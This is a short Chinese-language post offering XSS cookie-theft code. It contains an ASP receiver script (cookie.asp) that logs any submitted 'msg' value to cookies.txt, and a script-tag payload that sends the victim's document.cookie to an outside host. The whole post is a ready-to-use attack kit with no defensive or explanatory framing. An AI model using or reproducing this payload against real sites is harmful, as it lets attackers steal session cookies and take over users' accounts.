xss获取cookie源码附利用代码

  保存为cookie.asp

<% 
testfile=Server.MapPath("cookies.txt") 
msg=Request("msg") 
set fs=server.CreateObject("scripting.filesystemobject") 
set thisfile=fs.OpenTextFile(testfile,8,True,0) 
thisfile.WriteLine(""&msg& "") 
thisfile.close 
set fs = nothing 
%>

　　

利用代码：

<script>window.open('http://zhimo.yuanzhumuban.cc/cookie.asp?msg='+document.cookie)</script>